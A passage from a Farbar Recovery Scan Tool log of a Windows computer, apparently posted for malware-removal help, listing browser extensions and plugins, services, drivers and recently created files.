FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Sunbird\Profiles\qf1m1mra.default [2016-08-26]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\[email protected] [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\{e2fda1a4-762b-4020-b5ad-a41df1933103} [not found]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 [2019-11-09]
FF Homepage: Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 -> hxxps://www.google.com/webhp?complete=0&hl=en
FF Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Video | GIF Downloader for Twitter) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7bcecd12-7e59-44fd-b721-8852ae8b20a8}.xpi [2019-08-24]
FF Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7fee47a1-8299-4576-90bf-5fd88d756926}.xpi [2019-08-24]
FF Extension: (Video Scrubber for Instagram) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{a68cb35a-62b5-4786-99f4-3e435f6590aa}.xpi [2019-11-08]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810 [2017-05-05]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2019-02-19]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2018-07-17]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: (RealDownloader) - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-11-24] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{338950EA-82DB-44C1-930D-0C28E023C9F0}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi
FF Extension: (KeepVid Pro) - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi [2017-09-02] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @ASC/FileLabPlugin;version=1.1.33 -> C:\ProgramData\FileLab\Plugin\Framework\npFlPluginS.dll [2012-02-20] (Ascensio System SIA -> FileLab) [File not signed]
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll [2017-11-21] (DivX, LLC -> DivX, LLC)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nokia.com/EnablerPlugin -> C:\Program Files (x86)\Nokia\Nokia Suite\npNokiaSuiteEnabler.dll [2014-11-19] (Nokia ->  )
FF Plugin-x32: @real.com/nppl3260;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.15 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-02-06] (RealNetworks, Inc. -> RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-08-02] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Vladana\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-02-20] (Unity Technologies ApS -> Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: pokki.com/PokkiDownloadHelper -> C:\Users\Vladana\AppData\Local\Pokki\Download Helper\npPokkiDownloadHelper.1.2.0.78.dll [No File]
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: torrents-time.com/TTPlugin -> C:\Program Files (x86)\TorrentsTime Media Player\bin\npTTPlugin.dll [No File]
 
Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.com/webhp?complete=0&hl=en
CHR StartupUrls: Profile 1 -> "chrome://apps/"
CHR NewTab: Profile 1 ->  Not-active:"chrome-extension://eedlgdlajadkbbjoobobefphmfkcchfk/newtab.html"
CHR DefaultSearchURL: Profile 1 -> hxxps://www.ecosia.org/search?q={searchTerms}&addon=chrome&addonversion=2.1.0
CHR DefaultSearchKeyword: Profile 1 -> ecosia
CHR DefaultSuggestURL: Profile 1 -> hxxps://ac.ecosia.org/?q={searchTerms}&type=list&mkt=en_US
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-09-06]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-11-19]
CHR Extension: (Slides) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-09-06]
CHR Extension: (Docs) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-09-06]
CHR Extension: (Google Drive) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-17]
CHR Extension: (Video Progress Bar & Controls for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bhdahocbinakfolafliljfkgkdeemgcd [2019-01-07]
CHR Extension: (YouTube) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-09-06]
CHR Extension: (Facebook) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\boeajhmfdjldchidhphikilcgdacljfm [2018-09-06]
CHR Extension: (Chrome IG Story) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bojgejgifofondahckoaahkilneffhmf [2019-02-16]
CHR Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2019-10-30]
CHR Extension: (Disable automatic tab discarding) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\dnhngfnfolbmhgealdpolmhimnoliiok [2019-09-26]
CHR Extension: (Ecosia Search) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\eedlgdlajadkbbjoobobefphmfkcchfk [2019-10-10]
CHR Extension: (Adobe Acrobat) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-11-18]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2019-10-05]
CHR Extension: (Sheets) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-09-06]
CHR Extension: (Skyload - Music and video downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fnmpfimijcopbiaiobinamadmnmhckmp [2019-08-23]
CHR Extension: (Emojis - Emoji Keyboard) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gaoflciahikhligngeccdecgfjngejlh [2019-11-02]
CHR Extension: (Google Docs Offline) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (Super Auto Refresh Plus) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\globgafddkdlnalejlkcpaefakkhkdoa [2019-10-19]
CHR Extension: (Stream Video Downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-15]
CHR Extension: (GoodTwitter) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jbanhionoclikdjnjlcmefiofgjimgca [2019-10-05]
CHR Extension: (Penzu) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\khgpedpfmjojllfmmhfabemdelhncneo [2018-09-06]
CHR Extension: (Google Hangouts) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\knipolnnllmklapflnccelgolnpehhpl [2019-05-23]
CHR Extension: (Google Maps) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2018-09-06]
CHR Extension: (Twitter Video Downloader | Fast and Free) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nbkknbagklenkcienihfapbfpjemnfoi [2019-10-28]
CHR Extension: (IG Stories for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilbfjdbacfdodpbdondbbkmoigehodg [2019-10-15]
CHR Extension: (Slinky Modern) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilnodhmmonndffbejancdeiggflcehi [2018-09-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-05]
CHR Extension: (Spotify Music Dwnloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\oefdcdmhklplgdmendjfnjeiijgcmabi [2019-01-25]
CHR Extension: (Gmail) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-30]
CHR Extension: (Chrome Media Router) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-10-24]
CHR Extension: (RightToCopy) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\plmcimdddlobkphnofejmeidjblideca [2018-12-02]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\System Profile [2018-09-06]
CHR HKU\S-1-5-21-7682389-3612777877-391866582-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [jbolfgndggfhhpbnkgnpjkfhinclbigj] - <no Path/update_url>
 
Opera: 
=======
OPR DownloadDir: C:\Users\Vladana\Desktop
OPR StartupUrls: "hxxps://www.google.rs/webhp?complete=0&hl=en&gws_rd=cr&ei=2SN4VYC0FIHbsgHZ8IDQCA"
OPR Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\filddmgeklidnenaibigmjeopkaccljm [2019-06-13]
OPR Extension: (Flash Video Downloader (FVD)) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\neacgcjokggofibnbfapeaejhclmpple [2018-09-09]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6085360 2019-10-04] (AVAST Software s.r.o. -> AVAST Software)
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [225280 2011-08-05] (Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc)
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [81280 2019-10-25] (Mixbyte Inc -> Freemake)
R2 FUJ02E3Service; C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation -> Intel Corporation)
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273168 2012-04-17] (Intel Corporation-Mobile Wireless Group -> )
R2 PFNService; C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe [2213376 2011-12-22] (FUJITSU LIMITED) [File not signed]
R2 PowerSavingUtilityService; C:\Program Files\Fujitsu\PSUtility\PSUService.exe [51608 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-10-26] (RealNetworks, Inc. -> )
S4 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
S4 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [31856 2014-10-30] (RealNetworks, Inc. -> )
R2 Update service; C:\Program Files (x86)\Popcorn Time\Updater.exe [339968 2015-10-19] (Popcorn Time) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292480 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [2671376 2012-04-17] (Intel Corporation-Mobile Wireless Group -> Intel® Corporation)
S3 WsDrvInst; C:\Program Files (x86)\iSkysoft\iSkysoft iTransfer\DriverInstall.exe [X]
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AMPPAL; C:\Windows\System32\DRIVERS\AMPPAL.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
S3 AMPPALP; C:\Windows\System32\DRIVERS\amppal.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [37616 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [204824 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [274456 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [209552 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [65120 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [276952 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42736 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [171520 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110320 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [83792 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [848432 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [460448 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [236024 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [316528 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [76192 2018-03-19] (Malwarebytes Corporation -> )
R0 FBIOSDRV; C:\Windows\System32\Drivers\FBIOSDRV.sys [21104 2009-06-24] (FUJITSU LIMITED  -> FUJITSU LIMITED)
R3 FUJ02B1; C:\Windows\System32\DRIVERS\FUJ02B1.sys [7808 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R3 FUJ02E3; C:\Windows\System32\DRIVERS\FUJ02E3.sys [7296 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [193768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [112864 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [44768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253664 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [93816 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 nmwcd; C:\Windows\System32\drivers\ccdcmbx64.sys [19968 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdc; C:\Windows\System32\drivers\ccdcmbox64.sys [27136 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsucx64; C:\Windows\System32\drivers\nmwcdnsucx64.sys [12800 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsux64; C:\Windows\System32\drivers\nmwcdnsux64.sys [171008 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 pccsmcfd; C:\Windows\System32\DRIVERS\pccsmcfdx64.sys [26112 2012-10-17] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-27] (Microsoft Windows Hardware Compatibility Publisher -> )
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2013-02-20] () [File not signed]
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 upperdev; C:\Windows\System32\DRIVERS\usbser_lowerfltx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 UsbserFilt; C:\Windows\System32\DRIVERS\usbser_lowerfltjx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
U3 asg68x4e; C:\Windows\System32\Drivers\asg68x4e.sys [0 0000-00-00] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U4 ekrn; no ImagePath
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) ===================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-19 01:52 - 2019-11-19 01:57 - 000046092 _____ C:\Users\Vladana\Desktop\FRST.txt
2019-11-19 01:50 - 2019-11-19 01:50 - 000003370 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-19 01:50 - 2019-11-19 01:50 - 000003240 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-19 01:41 - 2019-11-19 01:42 - 000017528 _____ C:\Users\Vladana\Desktop\Fixlog.txt
2019-11-19 01:39 - 2019-11-19 01:39 - 000000000 ____D C:\Users\Vladana\Desktop\Old
2019-11-18 21:23 - 2019-11-18 21:23 - 000001001 _____ C:\Users\Vladana\Desktop\iPool.lnk
2019-11-18 14:24 - 2019-11-19 01:55 - 000000000 ____D C:\FRST
2019-11-18 14:22 - 2019-11-18 14:52 - 002260480 _____ (Farbar) C:\Users\Vladana\Desktop\FRST64.exe
2019-11-16 17:33 - 2019-11-16 17:45 - 000000000 ____D C:\Users\Vladana\AppData\Local\CrashDumps
2019-11-16 16:40 - 2019-11-18 19:26 - 000000000 ____D C:\ProgramData\Hotspot Shield
2019-11-16 16:39 - 2019-11-16 16:39 - 000000000 ____D C:\Users\Vladana\AppData\Local\Turbo.net
2019-11-16 16:21 - 2019-11-16 16:21 - 000000000 ____D C:\Users\Vladana\Documents\Visual Studio 2005
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\Users\Public\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\ProgramData\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 14:14 - 2019-11-16 14:14 - 000001216 _____ C:\Users\Vladana\Desktop\4K Video Downloader.lnk
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\4K Video Downloader
